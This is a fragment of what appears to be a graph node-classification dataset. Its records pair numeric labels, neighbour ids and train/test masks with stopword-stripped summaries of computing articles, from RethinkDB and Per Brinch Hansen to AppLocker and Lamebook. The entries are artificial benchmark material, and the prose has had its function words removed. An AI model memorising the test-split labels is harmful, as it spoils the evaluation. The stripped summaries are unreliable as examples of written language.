    "text": "RethinkDB:rethinkdb rethinkdb free open-source distributed document-oriented database originally created company name database stores json documents dynamic schemas designed facilitate pushing real-time updates query results applications initially seed funded combinator june 2009 company announced october 2016 unable build sustainable business products would future entirely open-sourced without commercial support cncf cloud native computing foundation purchased rights rethinkdb source code contributed linux foundation rethinkdb founded 2009 open-sourced version 1.2 2012 2015 rethinkdb released version 2.0 announcing production-ready october 5 2016 company announced shutting transitioning members engineering team stripe would longer offer production support february 6 2017 cloud native computing foundation purchased rights source code relicensed apache license 2.0 rethinkdb uses reql query language internal embedded domain-specific language officially available ruby python java javascript including node.js support table joins groupings aggregations functions also unofficial community-supported drivers languages including c clojure erlang go haskell lua php according db-engines ranking february 2016 46th popular database distinguishing feature rethinkdb first class support real-time change feeds change query returns cursor allows blocking non-blocking requests keep track potentially infinite stream real-time changes due seeming stagnation rethinkdb forked members community may 17 2018 new project called rebirthdb also hosted github project later merged back original repository",
    "neighbors": [
      3876,
      8644,
      3462,
      5031,
      9828,
      4777,
      8554,
      4011,
      9926,
      5677,
      7983,
      5397,
      11221,
      823,
      6359,
      1435,
      9245
    ],
    "mask": "Test"
  },
  {
    "node_id": 4201,
    "label": 9,
    "text": "Per_Brinch_Hansen:per brinch hansen per brinch hansen november 13 1938 – july 31 2007 danish-american computer scientist known work operating systems concurrent programming parallel distributed computing per brinch hansen born frederiksberg enclave surrounded copenhagen denmark father worked civil engineer becoming leading expert soil mechanics later accepting professorship technical university denmark mother elsebeth brinch hansen née ring daughter danish composer oluf ring worked hairdresser marrying brinch hansen attended st. jørgens gymnasium studied electrical engineering technical university denmark sought area pursue still pioneering phase belief subject taught probably already late make fundamental contributions seven-week student internship ibm hursley laboratory england decided dedicate career computers initially focused computer construction reading book ibm project stretch described computer organization programmer point view refocused interest toward becoming computer architect completing master degree electronic engineering 1963 brinch hansen landed job regnecentralen research institution working compiler group led peter naur jørn jensen first significant project writing parser cobol compiler siemens 3003 computer subsequently wrote file system used execution compiled cobol programs later observing 1966 brinch hansen moved henning isaksson hardware group regnecentralen company shareholders together peter kraft defined architecture instruction set regnecentralen third computer rc 4000 using algol 60 hardware definition language produce formal specification inexperienced multiprogramming used copy cooperating sequential processes edsger dijkstra sent understand process synchronization using semaphores implemented specialized rc 4000 real-time monitor use managing fertilizer plant peter kraft then-teenaged charles simonyi wrote p-code interpreter data logging task programs compiled p-code summer 1967 brinch hansen left regnecentralen hardware group become head rc 4000 software development led team including jørn jensen peter kraft søren lauesen defining general-purpose rc 4000 multiprogramming system goal avoid developing custom real-time control operating system every rc 4000 installation support batch processing time-sharing well resulting system complete operating system small kernel providing mechanisms upon operating systems different purposes could built spring 1969 well-documented reliable version rc 4000 multiprogramming system running late 1970 brinch hansen moved pittsburgh accepting invitation alan perlis visit department computer science carnegie mellon university research associate wrote first systematic textbook operating system principles time 1971 summer school marktoberdorf symposium belfast brinch hansen tony hoare dijkstra began discuss ideas evolved monitor concept spring 1972 reading class concept invented ole-johan dahl kristen nygaard simula 67 brinch hansen completed text chapter resource protection proposed first monitor notation using shared classes 1973 operating system principles published becoming first comprehensive textbook operating systems july 1972 brinch hansen joined faculty caltech associate professor computer science began work defining programming language concurrent processes monitors april 1974 distributed technical report concurrent pascal concurrent pascal compiler pdp 11/45 written brinch hansen doctoral student al hartmann released january 1975 subsequently brinch hansen began writing model operating systems concurrent pascal evaluate language may 1975 completed solo single-user operating system development concurrent pascal programs next rewrote original rc 4000 real-time scheduler concurrent pascal taking three days write three hours machine time systematically test caltech computer science department shifted focus toward computer engineering away programming brinch hansen decided leave rather seek tenure 1976 brinch hansen chose usc next post family could remain altadena home joining faculty tenured full professor first chair newly created computer science department led efforts identify attract top-notch faculty build first rate department 1980 usc computer science department ranked national research council one top ten us usc brinch hansen wrote second book architecture concurrent programs based work developing operating systems concurrent pascal published 1977 first book concurrent programming 1978 brinch hansen became first computer scientist awarded doctor technices degree highest academic distinction within engineering technological science denmark work documented architecture concurrent programs later 1978 brinch hansen published distributed processes language concept proposing use remote procedure calls synchronize processes running across microcomputer network also 1978 l. j. sevins steve goings mostek visited brinch hansen usc outlined low-cost multiprocessor architecture mostek began project implement multiprocessor brinch hansen working consultant brinch hansen developed new concurrent programming language edison project rc 4000 project edison also used formal specification language hardware mostek got initial 4-node multiprocessor working brinch hansen wrote portable edison compiler pdp 11/55 shortly united technologies acquired mostek cancelled project 1982 brinch hansen moved edison system ibm pc published third book programming personal computer 1982 brinch hansen named first henry salvatori professor computer science usc 1984 feeling homesick denmark fourteen years abroad brinch hansen left usc joined faculty university copenhagen professor datalogy 1985 elected fellow ieee later 1985 fourth book brinch hansen pascal compilers used compiler course published designing multicomputer operating system danish company gn elmi brinch hansen concluded needed new language time leveraging message passing paradigm hoare csp resulting language joyce removed major limitation csp introducing parallel recursion brinch hansen developed portable implementation ibm pc finding neither family felt home denmark brinch hansen decided return us discovered immigration status required quickly brinch hansen contacted john reynolds syracuse university 1987 joined faculty distinguished professor working student rangachari anand joyce moved encore multimax 320 multiprocessor su northeast parallel architectures center recognizing scaling limitations multiprocessors however brinch hansen sought suitable multicomputer work acquiring meiko computing surface 1989 began experimenting scientific applications developing parallel programs householder reduction n-body simulation learning exercises surprised find programs nearly identical control structures concluding fit all-pairs paradigm focused exploring reusable parallel algorithm structures termed programming paradigms generic programs later popularly known design patterns 1995 brinch hansen fifth book studies computational science parallel programming paradigms published programs rewritten superpascal fully implemented publication language created parallel algorithms later years brinch hansen published retrospective important papers search simplicity 1996 text course programming non-majors programming everyone java 1999 retrospective evolution operating systems classic operating systems batch processing distributed systems 2001 retrospective evolution concurrent programming origin concurrent programming semaphores remote procedure calls 2002 self-published 2004 memoir programmer story life computer pioneer website 2002 brinch hansen awarded ieee computer pioneer award pioneering development operating systems concurrent programming exemplified work rc 4000 multiprogramming system monitors concurrent pascal july 31 2007 brinch hansen died shortly diagnosed terminal cancer brinch hansen met wife milena née hrastar class trip yugoslavia 1962 married 1965 two children daughter mette son thomas career spanning five decades brinch hansen made seminal contributions areas operating systems concurrent computing parallel distributed computing influential shaping development fields advancing ad hoc techniques systematic engineering disciplines impact work amplified relentless search simplicity insistence clarity writing rewriting papers many times publishing becoming one best explainers business commitment testing concepts working systems – brinch hansen implemented distributed working systems new concepts developed noting rc 4000 multiprogramming system introduced now-standard concept operating system kernel separation policy mechanism operating system design modern microkernel architectures trace roots extensible nucleus architecture rc 4000 improving microkernel performance major theme operating system research three decades rc 4000 brinch hansen text operating system principles first comprehensive textbook operating systems eventually published six languages english japanese german czech polish serbo-croatian remained print decades years rc 4000 system described become outdated 1990 nearly two decades initial publication p.j plauger reviewed saying 2005 acm members voted operating system principles top 25 classic book survey choose out-of-print classic books add acm digital library operating system principles ranked 15th survey appearing 8.8 ballots available acm digital library using concurrent pascal brinch hansen demonstrated feasible fully implement operating systems high level languages reduced development effort one two orders magnitude furthermore entire operating systems could published understood entirety brinch hansen precisely architecture concurrent programs leading roy maddux harlan mills declare part two book indeed remarkable entire operating system visible every line program open scrutiny hidden mystery studying extensive examples reader feels could tackle similar jobs could change system never seen operating system shown detail manner amenable modification brinch hansen hoare developed monitor concept brinch hansen published first monitor notation adopting class concept simula 67 invented queueing mechanism hoare refined rules process resumption brinch hansen created first implementation monitors concurrent pascal dozen additional monitor-based languages created 1990 simone modula csp/k ccnpascal ply pascal plus mesa sb-mod concurrent euclid pascalc concurrent c emerald real-time euclid pascal-fc turing plus predula concurrent pascal first concurrent programming language first language developed specifically concurrent programming importantly first language demonstrate possible incorporate secure high-level facilities concurrency system could guarantee processes access disjoint sets variables interfere time dependent ways hoare described outstanding example best academic research area source portable code concurrent pascal solo operating system distributed least 75 companies 100 universities 21 countries resulting widespread adoption porting adaptation industry academia greg andrews observed concurrent pascal monitors greatly influenced subsequent concurrent language proposals brinch hansen architecture concurrent programs first book concurrent programming eventually published three languages english japanese german dozen years publication p. j. plauger observed sure improvements made past dozen years better synchronization algorithms fancier necessarily better languages concurrency control wo n't find better overview concurrent programming book least n't found one 2005 acm members voted architecture concurrent programs top 25 classic book ranking 18th survey appearing 8 ballots available acm digital library remote procedure calls used modern operating systems trace roots back rc 4000 multiprogramming system used request-response communication protocol process synchronization 1978 paper distributed processes brinch hansen proposed language distributed computing based external requests consisting procedure calls processes later became known operating system context remote procedure call later brinch hansen developed two languages extending hoare csp message-passing paradigm parallel recursion showed efficiently implement",
    "neighbors": [
      10246,
      9224,
      7187,
      1952,
      9762,
      7983,
      2482,
      6652,
      11075,
      1350,
      8262,
      2248,
      3529,
      10568,
      9932,
      3159,
      1883,
      2012,
      7775,
      9441,
      9315,
      11242,
      2283,
      9714,
      5363,
      3323,
      2556,
      11262
    ],
    "mask": "None"
  },
  {
    "node_id": 4202,
    "label": 5,
    "text": "PME_Aggregation_Function:pme aggregation function pme aggregation function paf computer networking mechanism defined clause 61 ieee 802.3 standard allows one physical medium entities pmes combined together form single logical ethernet link paf located physical coding sublayer pcs media access control mac -phy rate matching function transmission convergence tc sublayer interfaces pmes across λ-interface mac-phy rate matching function using abstract interface paf optional function defined 2007 two ieee 802.3 interfaces 2base-tl 10pass-ts ethernet first mile efm copper physical layers pme aggregation function following characteristics paf transmit function works fragmenting incoming ethernet frames number fragments limited size range 64 512 bytes sequential fragmentation header prepended fragment indicating fragment start-of-packet end-of-packet middle packet frame check sequence fcs appended fragment transmitted next available active pme aggregated group following diagram illustrates paf fragmentation paf receive function reassembles original frames received fragments buffered per-mac fragment buffer algorithm uses fragmentation header make sure reassembled frames order pme aggregation function first defined ieee 802.3ah 2004 original loop aggregation proposal submitted klaus fosmark defunct first mile systems 2001 later referenced itu-t g.998.2 ethernet-based multi-pair bonding ansi equivalent nipp-nai t1.427.02 paf algorithm fragmentation header similar mlppp works layer 3 ip paf asymmetric protocol i.e information required reassembly contained fragmentation header sent fragment allowing great flexibility transmitter receiver implementations requires overhead consuming 5 bandwidth estimation 2base-tl protocol including 64b/65b encapsulation paf optimized ethernet traffic inverse multiplexing atm ima another aggregation protocol unlike paf uses fixed size cells sending across multiple links round-robin fashion ima optimized atm extreme cases short ethernet frames may add much 40 overhead due aal5 encapsulation itu-t g.998.3 multi-pair bonding using time-division inverse multiplexing specification a.k.a g.bond/tdim defines symmetric aggregation protocol sides point-to-point link exchange information aggregation need separate header g.bond/tdim optimized time-division multiplexing packet traffic less 3 overhead estimation ethernet traffic including generic framing procedure gfp encapsulation",
    "neighbors": [
      7815,
      6670,
      7478,
      5270,
      2998,
      8989
    ],
    "mask": "Test"
  },
  {
    "node_id": 4203,
    "label": 3,
    "text": "Intel_82288:intel 82288 intel 82288 bus controller designed intel 80286 chip supplied 20-pin dip package replaces 8288 used earlier processors",
    "neighbors": [
      2874,
      548,
      6453
    ],
    "mask": "Test"
  },
  {
    "node_id": 4204,
    "label": 3,
    "text": "Cannon_Lake_(microarchitecture):cannon lake microarchitecture cannon lake formerly skymont intel codename 10-nanometer die shrink kaby lake microarchitecture die shrink cannon lake new process intel process-architecture-optimization execution plan next step semiconductor fabrication cannon lake cpus first mainstream cpus include avx-512 instruction set prior cannon lake launch intel launched another 14 nm process refinement codename coffee lake successor cannon lake microarchitecture ice lake represents architecture phase intel process-architecture-optimization model cannon lake initially expected released 2015/2016 release pushed back 2018 intel demonstrated laptop unknown cannon lake cpu ces 2017 announced cannon lake based products would available 2018 earliest ces 2018 intel announced started shipping mobile cannon lake cpus end 2017 would ramp production 2018 april 26 2018 report first-quarter 2018 financial results intel stated currently shipping low-volume 10 nm product expects 10 nm volume production shift 2019 july 2018 intel announced volume production cannon lake would delayed yet late q2 2019 first laptop featuring cannon lake cpu namely intel core i3-8121u dual core cpu hyperthreading turbo boost without integrated gpu released may 2018 limited quantities august 16 2018 intel announced two new models nucs would use 10nm cannon lake-u i3-8121u cpu models later became readily available retail late november 2018",
    "neighbors": [
      3459,
      5380,
      2821,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      398,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      9500,
      5883,
      2088,
      10669,
      9391,
      10675,
      4276,
      1461,
      10548,
      2237,
      5309,
      8125,
      8126,
      833,
      6339,
      5444,
      9541,
      1998,
      2638,
      977,
      2514,
      5073,
      2516,
      5844,
      8795,
      7134,
      1119,
      1000,
      7657,
      5356,
      8684,
      9582,
      5871,
      10734,
      499,
      8820,
      3317,
      4217,
      4603,
      5503
    ],
    "mask": "None"
  },
  {
    "node_id": 4205,
    "label": 2,
    "text": "Yield_(multithreading):yield multithreading computer science yield action occurs computer program multithreading forcing processor relinquish control current running thread sending end running queue scheduling priority different programming languages implement yielding various ways coroutines fine-grained concurrency primitive may required yield explicitly may enable specifying another function take control coroutines explicitly yield allow cooperative multitasking",
    "neighbors": [
      785,
      7699,
      7963,
      6815,
      5798,
      9126,
      6184,
      2345,
      4909,
      5677,
      2045,
      7218,
      8501,
      5948,
      4286,
      2113,
      8514,
      5956,
      8262,
      4423,
      1480,
      1866,
      8523,
      4308,
      344,
      2264,
      731,
      2140,
      11487,
      4194,
      5090,
      7142,
      5872,
      7802,
      508,
      3197,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 4206,
    "label": 4,
    "text": "Focal_Point_Data_Risk:focal point data risk focal point data risk llc commonly known focal point risk management consulting firm based tampa fl focal point formed january 2017 result merger sunera aptec llc anrc llc company provides range cybersecurity risk management cybersecurity workforce development enterprise technology implementation services 2017 focal point named former cisco executive brian marlier chief executive officer focal point publishes annual cyber balance sheet report covering board-level cyber issues focal point originally founded sunera april 2005 former kpmg partners executives sunera focused original service offerings controls testing vulnerability assessments internal audit sarbanes-oxley compliance 2014 sunera acquired cyber risk management company formed norwest equity partners halyard capital partners sunera cyber risk management acquired anrc cyber security training provider 2014 aptec llc identity access management solutions integrator 2015 february 6 2015 florida governor rick scott announced expansion company ’ tampa headquarters expansion brought 41 new jobs 2015 2018",
    "neighbors": [
      6834,
      2558,
      11567
    ],
    "mask": "None"
  },
  {
    "node_id": 4207,
    "label": 3,
    "text": "TuxOnIce:tuxonice tuxonice formerly known suspend2 implementation suspend-to-disk hibernate feature available patches 2.6 linux kernel 2.5 kernel era pavel machek forked original out-of-tree version swsusp approximately beta 10 got merged vanilla kernel development continued swsusp/suspend2/tuxonice line tuxonice includes support smp highmem preemption major advantages swsusp tuxonice originally called 'suspend2 beta releases time pavel forked code base 1.0 release 2.0 release name 'suspend2 developed contraction 'software suspend 2.x efforts made time merge tuxonice vanilla kernel opposed pavel primarily seems pavel believes much suspend-to-disk process run userspace see uswsusp nigel cunningham thinks code belongs kernel nigel stated desire frustration getting tuxonice specific features merged back mainline currently actively pursuing",
    "neighbors": [
      3082,
      5139,
      10780,
      10785,
      6180,
      3109,
      8242,
      9266,
      4161,
      6213,
      8268,
      5222,
      10856,
      3197,
      4734,
      7812,
      4238,
      10382,
      2195,
      2711,
      9882,
      1694,
      2723,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      10482,
      2294,
      8439,
      2809,
      4360,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 4208,
    "label": 3,
    "text": "Andy_and_Bill's_law:andy bill law andy bill law statement regarding relationship hardware software upgrades law originates humorous one-liner told 1990s computing conferences andy giveth bill taketh away phrase riff upon business strategies former intel ceo andy grove former ceo microsoft bill gates intel microsoft entered lucrative partnership 1980s 1990s standard chipsets microsoft windows intel brand despite profit intel gained deal grove felt gates n't making full use powerful capabilities intel chips fact refusing upgrade software achieve optimum hardware performance grove frustration dominance microsoft software intel hardware became public spawned humorous catchphrase later andy bill law new software always push ahead hardware get credit performance computer",
    "neighbors": [
      2273,
      6801,
      2525,
      6797
    ],
    "mask": "None"
  },
  {
    "node_id": 4209,
    "label": 1,
    "text": "International_Thylacine_Specimen_Database:international thylacine specimen database international thylacine specimen database itsd culmination four-year research project catalogue digitally photograph known surviving specimen material thylacine thylacinus cynocephalus tasmanian tiger held within museum university private collections itsd first published electronic resource series three cd-roms april 2005 updated july 2006 completely revised may 2009 released single dvd totalling 3.68 gb data images itsd designed free access academic tool promote facilitate undergraduate postgraduate research species accessed offices curators heads department universities museums hold thylacine material alternatively libraries several major zoological societies itsd lists available catalogue data individual specimen e.g holding institution catalogue identification number sex date acquisition specimen type source locality collector field number old additional catalogue numbers purchase exchange information finally additional remarks pertaining specimen support data component significantly enhance educational worth high-resolution digital images specimens included itsd specimen image bank forms largest single photographic resource kind anywhere world primary justification including digital images specimen material within itsd comprises skins skeletons skulls taxidermy mounts wet specimens wet specimens whole animals organs body parts preserved either alcohol formalin specimens thylacine spread extensively around globe search locate specimens outset international search involving total 106 museum university private collections 23 countries master copy itsd held zoological society london mirror copies held within university tasmania hobart australian national wildlife collection canberra queen victoria museum art gallery launceston master mirror copies kept constantly revised updated new information comes light zoological society chosen hold master copy itsd historic association thylacine bulk early scientific papers species published within proceedings society zoo regent park exhibited thylacines zoo outside australia year royal zoological society new south wales hosts whitley awards awards tribute gilbert whitley eminent australian ichthyologist presented outstanding publications contain significant amount new information relating fauna australasian region september 2005 international thylacine specimen database awarded whitley award best zoological database first time history awards whitley citation presented database",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4210,
    "label": 2,
    "text": "AppLocker:applocker applocker application whitelisting technology introduced microsoft windows 7 operating system allows restricting programs users execute based program path publisher hash enterprise configured via group policy windows applocker allows administrators control executable files denied allowed execute applocker administrators able create rules based file names publishers file location allow certain files execute unlike earlier software restriction policies originally available windows xp windows server 2003 applocker rules apply individuals groups policies used group users different enforcement levels example users added 'audit policy allow administrators see rule violations moving user higher enforcement level several generic techniques bypassing applocker",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      582,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      8798,
      3170,
      622,
      9839,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      651,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      4074,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 4211,
    "label": 3,
    "text": "Espresso_(microprocessor):espresso microprocessor espresso codename 32-bit central processing unit cpu used nintendo wii u video game console designed ibm produced using 45 nm silicon-on-insulator process espresso chip resides together gpu amd mcm manufactured renesas revealed e3 2011 june 2011 released november 2012 ibm nintendo revealed espresso processor powerpc-based microprocessor three cores single chip reduce power consumption increase speed cpu graphics processor placed single substrate multi-chip module mcm reduce complexity increase communication speed chips reduce power consumption reduce cost space required two chips assembled complete mcm renesas japan espresso manufactured ibm 300 mm plant east fishkill new york using 45 nm soi-technology embedded dram edram caches unverified nintendo hackers teardowns unofficial informants since revealed information espresso name size speed microarchitecture seems quite similar predecessors broadway gekko i.e powerpc 750 based enhanced larger faster caches multiprocessor support rumors wii u cpu derived ibm high-end power7 server processor proved false presumably order cut costs espresso shares technology power7 edram general instruction set similarities superficial similarities following specifications officially confirmed either nintendo ibm obtained reverse engineering hacker hector martin goes alias marcan",
    "neighbors": [
      6914,
      7170,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      398,
      6926,
      3472,
      4881,
      659,
      7065,
      1563,
      1309,
      6815,
      10784,
      10658,
      3493,
      6949,
      6311,
      4136,
      1321,
      8102,
      9391,
      10543,
      4017,
      5297,
      8120,
      6715,
      9020,
      1725,
      10173,
      1983,
      1985,
      10180,
      6981,
      2635,
      336,
      8530,
      3540,
      342,
      9302,
      4569,
      11613,
      6878,
      1635,
      8931,
      869,
      10214,
      10985,
      10734,
      1776,
      3185,
      4465,
      5235,
      5617,
      5237,
      8058,
      3323,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 4212,
    "label": 4,
    "text": "IOActive:ioactive ioactive independent computer security company active several areas known reporting high severity security vulnerabilities variety products ioactive offices seattle london dubai madrid",
    "neighbors": [
      5636,
      11,
      688,
      851,
      2484,
      918,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4213,
    "label": 8,
    "text": "P3P:p3p platform privacy preferences project p3p obsolete protocol allowing websites declare intended use information collect web browser users designed give users control personal information browsing p3p developed world wide web consortium w3c officially recommended april 16 2002 development ceased shortly thereafter implementations p3p microsoft internet explorer edge major browsers support p3p microsoft ended support windows 10 onwards microsoft internet explorer edge windows 10 longer support p3p president truste stated p3p implemented widely due difficulty lack value world wide web became genuine medium sell products services electronic commerce websites tried collect information people purchased merchandise companies used controversial practices tracker cookies ascertain users demographic information buying habits using information provide specifically targeted advertisements users saw invasion privacy would sometimes turn http cookies use proxy servers keep personal information secure p3p designed give users precise control kind information allow release according w3c main goal p3p “ increase user trust confidence web technical empowerment. ” p3p machine-readable language helps express website ’ data management practices p3p manages information privacy policies website uses p3p set set policies allows state intended uses personal information may gathered site visitors user decides use p3p set set policies state personal information allow seen sites visit user visits site p3p compare personal information user willing release information server wants get – two match p3p inform user ask he/she willing proceed site risk giving personal information example user may store browser preferences information browsing habits collected policy website states cookie used purpose browser automatically rejects cookie main content privacy policy following privacy policy retrieved xml file included compact form http header location xml policy file applies given document p3p allows specify codice_1 caching dummy /w3c/p3p.xml file could use feature microsoft internet explorer edge mainstream web browsers supported p3p browsers implemented due perceived lack value provides ie provides ability display p3p privacy policies compare p3p policy browser settings decide whether allow cookies particular site however p3p functionality internet explorer extends cookie blocking alert user entire web site violates active privacy preferences microsoft considers feature deprecated browsers totally removed p3p support windows 10 mozilla supported p3p features years p3p related source code removed 2007 privacy finder service also created carnegie mellon usable privacy security laboratory publicly available p3p-enabled search engine user enter search term along stated privacy preferences presented list search results ordered based whether sites comply preferences works crawling web maintaining p3p cache every site ever appears search query cache updated every 24 hours every policy guaranteed relatively date service also allows users quickly determine site comply preferences well allowing view dynamically generated natural language privacy policy based p3p data advantageous simply reading original natural language privacy policy web site many privacy policies written legalese extremely convoluted additionally case user visit web site read privacy policy p3p allows browsers understand privacy policies simplified organized manner rather searching throughout entire website setting privacy settings certain level user enables p3p automatically block cookies user might want computer additionally w3c explains p3p allow browsers transfer user data services ultimately promoting online sharing community additionally p3p toolbox developed internet education foundation recommends anyone concerned increasing users ’ trust privacy consider implementing p3p p3p toolbox site explains companies taken individuals data order promote new products services furthermore recent years companies taken individuals information created profiles market without individual consent moreover data misused consumers pay price become worrisome issues junk mail identity theft forms discrimination therefore implementing p3p protocol good beneficial internet browsers moreover since increase browsers users risk running privacy problems internet education foundation points “ p3p developed help steer force technology step toward automatic communication data management practices individual privacy preferences. ” electronic privacy information center epic critical p3p believes p3p makes difficult users protect privacy 2002 assessed p3p referred technology “ pretty poor policy ” according epic p3p software complex difficult average person understand many internet users unfamiliar use default p3p software computers install additional p3p software another concern websites obligated use p3p neither internet users moreover epic website claims p3ps protocol would become burdensome browser beneficial efficient intended key problem occurs use p3p lack enforcement thus promises made users p3p go unfulfilled though using p3p company/website makes promise privacy use gathered data site ’ users real legal ramifications company decides use information functions currently actual laws passed united states data protection though ideally companies honest use customers personal information binding reason company must actually adhere rules says comply though using p3p technically qualifies contract lack federal regulation downplays need companies abide agreement use p3p puts place unenforceable promises also prolongs adoption federal laws would actually inhibit access ability use private information government step attempt protect internet users federal laws information accessed specific regulations user information used companies ’ maintain leeway use information please despite may actually tell users 2002 epic employee chris hoofnagle argued p3p displacing chances government regulation privacy critics p3p also argue non-compliant sites excluded according study done cylab privacy interest group carnegie mellon university 15 top 5,000 websites incorporate p3p therefore many sites ’ include code practice high privacy standards accessible users use p3p online privacy guide epic also talks development implementation p3p cause monopoly private information since tends major companies implement p3p websites major companies tending gather information seeing privacy policies compare privacy preferences users epic website says incredible complexity p3p combined way popular browsers likely implement protocol would seem preclude privacy-protective technology epic continues state rather p3p may actually strengthen monopoly position personal information u.s. data marketers enjoy failure immediate adoption related idea notice choice approach ’ comply fair information practices according chairman ftc privacy laws key today ’ society order protect consumer providing much personal information others ’ benefit believe limit collection use consumer ’ personal data online currently sites required united states laws comply privacy policies publish therefore p3p causes controversy consumers concerned release personal information able rely p3p ’ protocol protect privacy michael kaply ibm reported saying following mozilla foundation considering removal p3p support browser-line 2004 ah memories ibm wrote original p3p implementation netscape proceeded write companies wasted immense amounts time everyone thought crappy proposal begin remove live leer pr manager opera software explained 2001 deliberate lack p3p support browser moment n't sure whether p3p best solution p3p among specifications considering support future issues well p3p protect privacy reason decided wait resolved p3p user agents option available internet users want ensure privacy several main alternatives p3p include using web browsers privacy mode anonymous e-mailers anonymous proxy servers main alternative p3p may technologies instead stronger laws regulate kind information internet users collected retained websites example europe data protection directive provides individuals certain set principles personal information collected person rights protecting personal data act allows individuals control type information collected various principles included within act rule individual right retrieve data collected time certain conditions moreover individual personal information kept longer necessary personal information released others unless individual gives consent currently united states federal law protecting privacy personal information shared online however sectoral laws federal state level offer protection certain types information collected individuals example fair credit reporting act fcra 1970 makes legal consumer reporting agencies disclose personal information three specified circumstances credit employment insurance evaluation government grant license “ legitimate business need ” involves consumer list sectoral privacy laws united states viewed consumer privacy guide website many groups working future p3p make easier people use groups transparent accountable datamining initiative tami group mit ’ computer science artificial intelligence laboratory goal tami create technical legal policy foundations transparency accountability large-scale aggregation tami hopes help people manage privacy risks world technology constantly changing policy aware web paw scalable mechanism exchange rules proofs unlimited access control web “ creates system policy aware infrastructure using systematic web rules language theorem prover ”",
    "neighbors": [
      2818,
      11650,
      8070,
      7943,
      8080,
      5907,
      8086,
      7965,
      10910,
      7455,
      4768,
      8735,
      10791,
      3521,
      7878,
      119,
      1368,
      8281,
      8923,
      479,
      6629,
      4326,
      10611,
      4725,
      502,
      6775,
      2296,
      10486,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 4214,
    "label": 7,
    "text": "Commotion_Wireless:commotion wireless commotion wireless open-source wireless mesh network electronic communication project developed open technology institute development included 2 million grant united states department state 2011 use mobile ad hoc network manet concomitant arab spring preliminarily deployed detroit late 2012 launched generally march 2013 project called internet suitcase commotion 1.0 first non-beta release launched december 30 2013 commotion relies several open source projects olsr openwrt openbts serval project ubiquiti tp-link mikrotik",
    "neighbors": [
      610,
      10451
    ],
    "mask": "Test"
  },
  {
    "node_id": 4215,
    "label": 8,
    "text": "Lamebook:lamebook lamebook blog re-posts 'everything lame funny social networking site facebook users send screenshots unusual amusing facebook posts re-posted site every weekday jonathan standefer matthew genitempo graphic designers austin texas launched web site april 2009 facebook parody site two acquaintances baylor university yet became friends graduated 2005 started lamebook little meeting months got popular able quit jobs offices full time said genitempo graduated 2007 degree graphic design brought lot different design opportunities us last names faces blurred pixellated upon upload avoid invasion privacy content removed request lamebook also discourages users trying contact people seen posts sites lamebook would existence without concept oversharing overshare word year 2008 webster new world® college dictionary defined much information either intentionally accidentally revealed editors webster new world explain new word old phenomenon made much easier emergence modern technology ease combined wide reach many social networking sites allow users made oversharing quite common occurrence today according huffington post online oversharers 32 say experienced poster ’ remorse regretted posting certain information lamebook cocreator jonathan standefer quoted saying people overshare internet favorite ones used mushy ones fights funniest like fighting drunk one friends everyone else room views lamebook forum people vent inappropriate cringe-worthy things inevitably seen facebook glamour magazine described facebook personal confession booth air dirty laundry sitting behind computer screen people often forget everyone else room facebook anything posted outside private message seen many people one communicated leads kinds content people submit lamebook couple fights inappropriate pictures embarrassing statuses etc march 2010 facebook contacted lamebook alleging website infringed diluted facebook trademark requested lamebook cease desist using lamebook mark change name look website 4 november 2010 lamebook filed legal action facebook seeking declaration website infringe rights facebook protection parody first amendment response 11 november facebook sued lamebook trademark infringement claiming site parody provide critique comment facebook 22 november 2010 facebook confirmed deleted lamebook fan page blocked 'like function lamebook powered facebook blocked facebook users able type word lamebook facebook facebook cto bret taylor later conceded mistake part process dealing routine trademark violation issue regarding links posted facebook blocked mentions phrase “ lamebook ” facebook committed promoting free expression facebook apologize mistake case working fix process led happening conor civins one lamebook lawyers said lamebook parody website supposed social commentary protected free speech lamebook website litigation process banner asking viewers support efforts facebook read really love running lamebook aside laughs represents opportunity work incredibly fun project buddies makes lot people happy still allows us make rent end month … problem facebook ’ get joke ’ decided pick little guys small business owners seem match multi-billion dollar behemoth one website ’ going without fight dispute came end facebook efforts relocate litigation process austin texas palo alto california denied texas federal judge joint statement released 25 august 2011 companies proclaimed pleased arrive agreement protects facebook brand trademark allows lamebook continued operation parties satisfied users likely confused thus forth lamebook permitted continue name yet must add disclaimer website reads unofficial parody affiliated associated endorsed approved facebook lamebook also allowed seek trademark protection name lamebook best worst facebook expected released chronicle books 2012",
